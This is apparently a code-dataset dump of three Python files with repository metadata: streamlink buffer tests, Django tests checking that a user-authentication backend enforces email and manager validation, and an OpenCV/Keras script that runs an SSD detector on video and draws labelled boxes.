self.assertEqual(self.buffer.read(4095), b"1" * 4095)
self.assertEqual(self.buffer.read(8192), b"2" * 4096)
self.assertEqual(self.buffer.read(8192), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_close(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.buffer.close()
self.buffer.write(b"2" * 8192)
self.assertEqual(self.buffer.length, 8192)
def test_reuse_input(self):
original = b"original"
tests = [bytearray(original), memoryview(bytearray(original))]
for data in tests:
self.buffer.write(data)
data[:] = b"reused!!"
self.assertEqual(self.buffer.read(), original)
def test_read_empty(self):
self.assertRaises(
StopIteration,
lambda: next(self.buffer._iterate_chunks(10)))
class TestRingBuffer(unittest.TestCase):
BUFFER_SIZE = 8192 * 4
def setUp(self):
self.buffer = RingBuffer(size=self.BUFFER_SIZE)
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.length, 0)
def test_read_timeout(self):
self.assertRaises(
IOError,
self.buffer.read, timeout=0.1)
def test_write_after_close(self):
self.buffer.close()
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 0)
self.assertTrue(self.buffer.closed)
def test_resize(self):
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE)
self.buffer.resize(self.BUFFER_SIZE * 2)
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE * 2)
def test_free(self):
self.assertEqual(self.buffer.free, self.BUFFER_SIZE)
self.buffer.write(b'1' * 100)
self.assertEqual(self.buffer.free, self.BUFFER_SIZE - 100)
| true
| true
|
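For the test_buffer.py record above, a short illustration of the semantics those tests pin down, assuming streamlink is importable (a sketch; exact blocking behaviour can vary across streamlink versions):
from streamlink.buffers import RingBuffer

buf = RingBuffer(size=16)
buf.write(b"0123456789")
assert buf.read(4) == b"0123"  # reads consume data in FIFO order
assert buf.length == 6         # six unread bytes remain
assert buf.free == 16 - 6      # free space is size minus unread data
buf.close()
buf.write(b"ignored")          # writes after close() are dropped
assert buf.length == 6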
790de139870f747ae341b9866271e007ce38a944
| 3,093
|
py
|
Python
|
dakara_server/users/tests/test_backends.py
|
DakaraProject/dakara-server
|
b28fc1a8561e431d562102932f3d6ff3607e545b
|
[
"MIT"
] | 4
|
2018-07-24T18:22:16.000Z
|
2020-01-24T16:30:54.000Z
|
dakara_server/users/tests/test_backends.py
|
DakaraProject/dakara-server
|
b28fc1a8561e431d562102932f3d6ff3607e545b
|
[
"MIT"
] | 88
|
2017-11-04T08:58:02.000Z
|
2022-03-30T11:39:08.000Z
|
dakara_server/users/tests/test_backends.py
|
DakaraProject/dakara-server
|
b28fc1a8561e431d562102932f3d6ff3607e545b
|
[
"MIT"
] | 1
|
2018-05-05T15:37:20.000Z
|
2018-05-05T15:37:20.000Z
|
from unittest.mock import MagicMock
from django.core.exceptions import ValidationError
from users.backends import DakaraModelBackend
from users.tests.base_test import UsersAPITestCase, config_email_disabled
class DakaraModelBackendTestCase(UsersAPITestCase):
"""Test the authentication backend."""
def setUp(self):
# create a user without any rights
self.user = self.create_user("TestUser", email="test@user.com", password="pass")
def test_authenticate_username_superuser(self):
"""Test to authenticate as superuser."""
self.user.is_superuser = True
self.user.validated_by_email = False
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_active(self):
"""Test to authenticate an inactive user."""
self.user.is_active = False
self.user.save()
backend = DakaraModelBackend()
self.assertIsNone(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
)
def test_authenticate_username_not_validated_by_email(self):
"""Test to authenticate when not validated by email."""
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user email has not been validated"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
@config_email_disabled
def test_authenticate_username_not_validated_by_email_no_email(self):
"""Test to authenticate when not validated by email and emails disabled."""
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_validated_by_manager(self):
"""Test to authenticate when not validated by manager."""
self.user.validated_by_email = True
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user account has not been validated by a manager"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
def test_authenticate_username_ok(self):
"""Test to authenticate."""
self.user.validated_by_email = True
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
| 35.551724
| 88
| 0.66602
|
from unittest.mock import MagicMock
from django.core.exceptions import ValidationError
from users.backends import DakaraModelBackend
from users.tests.base_test import UsersAPITestCase, config_email_disabled
class DakaraModelBackendTestCase(UsersAPITestCase):
def setUp(self):
self.user = self.create_user("TestUser", email="test@user.com", password="pass")
def test_authenticate_username_superuser(self):
self.user.is_superuser = True
self.user.validated_by_email = False
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_active(self):
self.user.is_active = False
self.user.save()
backend = DakaraModelBackend()
self.assertIsNone(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
)
def test_authenticate_username_not_validated_by_email(self):
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user email has not been validated"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
@config_email_disabled
def test_authenticate_username_not_validated_by_email_no_email(self):
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_validated_by_manager(self):
self.user.validated_by_email = True
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user account has not been validated by a manager"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
def test_authenticate_username_ok(self):
self.user.validated_by_email = True
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
| true
| true
|
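The dakara tests above exercise a ModelBackend subclass that gates login on extra validation flags. The sketch below shows that general pattern with a hypothetical ValidatedBackend; it is not the actual DakaraModelBackend source, and the two flag attributes are assumed to exist on the user model:
from django.contrib.auth.backends import ModelBackend
from django.core.exceptions import ValidationError

class ValidatedBackend(ModelBackend):  # hypothetical name, pattern only
    def authenticate(self, request, username=None, password=None, **kwargs):
        user = super().authenticate(request, username=username,
                                    password=password, **kwargs)
        if user is None or user.is_superuser:
            # bad credentials or inactive users yield None; superusers bypass checks
            return user
        if not user.validated_by_email:  # assumed custom field
            raise ValidationError("This user email has not been validated")
        if not user.validated_by_manager:  # assumed custom field
            raise ValidationError(
                "This user account has not been validated by a manager")
        return user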
790de37a120d52978b54761134121afb95f0f831
| 7,659
|
py
|
Python
|
yassd/testing_utils/videotest.py
|
hanhejia/SSD
|
0c5684ad786768b46b119fb503f4f7174e2c78ed
|
[
"MIT"
] | null | null | null |
yassd/testing_utils/videotest.py
|
hanhejia/SSD
|
0c5684ad786768b46b119fb503f4f7174e2c78ed
|
[
"MIT"
] | null | null | null |
yassd/testing_utils/videotest.py
|
hanhejia/SSD
|
0c5684ad786768b46b119fb503f4f7174e2c78ed
|
[
"MIT"
] | null | null | null |
""" A class for testing a SSD model on a video file or webcam """
import cv2
import keras
from keras.applications.imagenet_utils import preprocess_input
from keras.backend.tensorflow_backend import set_session
from keras.models import Model
from keras.preprocessing import image
import pickle
import numpy as np
from random import shuffle
from scipy.misc import imread, imresize
from timeit import default_timer as timer
import sys
sys.path.append("..")
from ssd_utils import BBoxUtility
class VideoTest(object):
""" Class for testing a trained SSD model on a video file and show the
result in a window. Class is designed so that one VideoTest object
can be created for a model, and the same object can then be used on
multiple videos and webcams.
Arguments:
class_names: A list of strings, each containing the name of a class.
The first name should be that of the background class
which is not used.
model: An SSD model. It should already be trained for
images similar to the video to test on.
input_shape: The shape that the model expects for its input,
as a tuple, for example (300, 300, 3)
bbox_util: An instance of the BBoxUtility class in ssd_utils.py
The BBoxUtility needs to be instantiated with
the same number of classes as the length of
class_names.
"""
def __init__(self, class_names, model, input_shape):
self.class_names = class_names
self.num_classes = len(class_names)
self.model = model
self.input_shape = input_shape
self.bbox_util = BBoxUtility(self.num_classes)
# Create unique and somewhat visually distinguishable bright
# colors for the different classes.
self.class_colors = []
for i in range(0, self.num_classes):
# This can probably be written in a more elegant manner
hue = 255*i/self.num_classes
col = np.zeros((1,1,3)).astype("uint8")
col[0][0][0] = hue
col[0][0][1] = 128 # Saturation
col[0][0][2] = 255 # Value
cvcol = cv2.cvtColor(col, cv2.COLOR_HSV2BGR)
col = (int(cvcol[0][0][0]), int(cvcol[0][0][1]), int(cvcol[0][0][2]))
self.class_colors.append(col)
def run(self, video_path = 0, start_frame = 0, conf_thresh = 0.6):
""" Runs the test on a video (or webcam)
# Arguments
        video_path: A file path to a video to be tested on. Can also be a number,
                    in which case the webcam with the same number (e.g. 0) is
                    used instead.
start_frame: The number of the first frame of the video to be processed
by the network.
conf_thresh: Threshold of confidence. Any boxes with lower confidence
are not visualized.
"""
vid = cv2.VideoCapture(video_path)
if not vid.isOpened():
raise IOError(("Couldn't open video file or webcam. If you're "
"trying to open a webcam, make sure you video_path is an integer!"))
# Compute aspect ratio of video
vidw = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
vidh = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
vidar = vidw/vidh
        # Skip frames until reaching start_frame (start_frame is a frame index,
        # so CAP_PROP_POS_FRAMES is used rather than CAP_PROP_POS_MSEC)
        if start_frame > 0:
            vid.set(cv2.CAP_PROP_POS_FRAMES, start_frame)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
retval, orig_image = vid.read()
if not retval:
print("Done!")
return
im_size = (self.input_shape[0], self.input_shape[1])
resized = cv2.resize(orig_image, im_size)
rgb = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
# Reshape to original aspect ratio for later visualization
# The resized version is used, to visualize what kind of resolution
# the network has to work with.
to_draw = cv2.resize(resized, (int(self.input_shape[0]*vidar), self.input_shape[1]))
# Use model to predict
inputs = [image.img_to_array(rgb)]
tmp_inp = np.array(inputs)
x = preprocess_input(tmp_inp)
y = self.model.predict(x)
# This line creates a new TensorFlow device every time. Is there a
# way to avoid that?
results = self.bbox_util.detection_out(y)
if len(results) > 0 and len(results[0]) > 0:
# Interpret output, only one frame is used
det_label = results[0][:, 0]
det_conf = results[0][:, 1]
det_xmin = results[0][:, 2]
det_ymin = results[0][:, 3]
det_xmax = results[0][:, 4]
det_ymax = results[0][:, 5]
top_indices = [i for i, conf in enumerate(det_conf) if conf >= conf_thresh]
top_conf = det_conf[top_indices]
top_label_indices = det_label[top_indices].tolist()
top_xmin = det_xmin[top_indices]
top_ymin = det_ymin[top_indices]
top_xmax = det_xmax[top_indices]
top_ymax = det_ymax[top_indices]
for i in range(top_conf.shape[0]):
xmin = int(round(top_xmin[i] * to_draw.shape[1]))
ymin = int(round(top_ymin[i] * to_draw.shape[0]))
xmax = int(round(top_xmax[i] * to_draw.shape[1]))
ymax = int(round(top_ymax[i] * to_draw.shape[0]))
# Draw the box on top of the to_draw image
class_num = int(top_label_indices[i])
cv2.rectangle(to_draw, (xmin, ymin), (xmax, ymax),
self.class_colors[class_num], 2)
text = self.class_names[class_num] + " " + ('%.2f' % top_conf[i])
text_top = (xmin, ymin-10)
text_bot = (xmin + 80, ymin + 5)
text_pos = (xmin + 5, ymin)
cv2.rectangle(to_draw, text_top, text_bot, self.class_colors[class_num], -1)
cv2.putText(to_draw, text, text_pos, cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
# Calculate FPS
# This computes FPS for everything, not just the model's execution
# which may or may not be what you want
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
# Draw FPS in top left corner
cv2.rectangle(to_draw, (0,0), (50, 17), (255,255,255), -1)
cv2.putText(to_draw, fps, (3,10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
cv2.imshow("SSD result", to_draw)
cv2.waitKey(10)
| 41.625
| 100
| 0.536362
|
import cv2
import keras
from keras.applications.imagenet_utils import preprocess_input
from keras.backend.tensorflow_backend import set_session
from keras.models import Model
from keras.preprocessing import image
import pickle
import numpy as np
from random import shuffle
from scipy.misc import imread, imresize
from timeit import default_timer as timer
import sys
sys.path.append("..")
from ssd_utils import BBoxUtility
class VideoTest(object):
def __init__(self, class_names, model, input_shape):
self.class_names = class_names
self.num_classes = len(class_names)
self.model = model
self.input_shape = input_shape
self.bbox_util = BBoxUtility(self.num_classes)
self.class_colors = []
for i in range(0, self.num_classes):
hue = 255*i/self.num_classes
col = np.zeros((1,1,3)).astype("uint8")
col[0][0][0] = hue
col[0][0][1] = 128
col[0][0][2] = 255
cvcol = cv2.cvtColor(col, cv2.COLOR_HSV2BGR)
col = (int(cvcol[0][0][0]), int(cvcol[0][0][1]), int(cvcol[0][0][2]))
self.class_colors.append(col)
def run(self, video_path = 0, start_frame = 0, conf_thresh = 0.6):
vid = cv2.VideoCapture(video_path)
if not vid.isOpened():
raise IOError(("Couldn't open video file or webcam. If you're "
"trying to open a webcam, make sure you video_path is an integer!"))
vidw = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
vidh = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
vidar = vidw/vidh
        if start_frame > 0:
            vid.set(cv2.CAP_PROP_POS_FRAMES, start_frame)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
retval, orig_image = vid.read()
if not retval:
print("Done!")
return
im_size = (self.input_shape[0], self.input_shape[1])
resized = cv2.resize(orig_image, im_size)
rgb = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
to_draw = cv2.resize(resized, (int(self.input_shape[0]*vidar), self.input_shape[1]))
inputs = [image.img_to_array(rgb)]
tmp_inp = np.array(inputs)
x = preprocess_input(tmp_inp)
y = self.model.predict(x)
results = self.bbox_util.detection_out(y)
if len(results) > 0 and len(results[0]) > 0:
det_label = results[0][:, 0]
det_conf = results[0][:, 1]
det_xmin = results[0][:, 2]
det_ymin = results[0][:, 3]
det_xmax = results[0][:, 4]
det_ymax = results[0][:, 5]
top_indices = [i for i, conf in enumerate(det_conf) if conf >= conf_thresh]
top_conf = det_conf[top_indices]
top_label_indices = det_label[top_indices].tolist()
top_xmin = det_xmin[top_indices]
top_ymin = det_ymin[top_indices]
top_xmax = det_xmax[top_indices]
top_ymax = det_ymax[top_indices]
for i in range(top_conf.shape[0]):
xmin = int(round(top_xmin[i] * to_draw.shape[1]))
ymin = int(round(top_ymin[i] * to_draw.shape[0]))
xmax = int(round(top_xmax[i] * to_draw.shape[1]))
ymax = int(round(top_ymax[i] * to_draw.shape[0]))
class_num = int(top_label_indices[i])
cv2.rectangle(to_draw, (xmin, ymin), (xmax, ymax),
self.class_colors[class_num], 2)
text = self.class_names[class_num] + " " + ('%.2f' % top_conf[i])
text_top = (xmin, ymin-10)
text_bot = (xmin + 80, ymin + 5)
text_pos = (xmin + 5, ymin)
cv2.rectangle(to_draw, text_top, text_bot, self.class_colors[class_num], -1)
cv2.putText(to_draw, text, text_pos, cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
# which may or may not be what you want
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
# Draw FPS in top left corner
cv2.rectangle(to_draw, (0,0), (50, 17), (255,255,255), -1)
cv2.putText(to_draw, fps, (3,10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
cv2.imshow("SSD result", to_draw)
cv2.waitKey(10)
| true
| true
|
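Finally, the videotest.py record builds per-class colors by spreading hues evenly and converting HSV to BGR. Below is a self-contained sketch of that trick (note that OpenCV's uint8 HSV hue range is 0-179, which the record's 0-255 scaling quietly exceeds; the sketch uses the 0-179 scale):
import cv2
import numpy as np

def class_colors(num_classes):
    # evenly spaced hues converted HSV -> BGR, as in VideoTest.__init__
    colors = []
    for i in range(num_classes):
        col = np.zeros((1, 1, 3), dtype="uint8")
        col[0][0] = (int(180 * i / num_classes), 128, 255)  # hue, saturation, value
        bgr = cv2.cvtColor(col, cv2.COLOR_HSV2BGR)[0][0]
        colors.append(tuple(int(c) for c in bgr))
    return colors

print(class_colors(4))  # four bright, visually distinct BGR colors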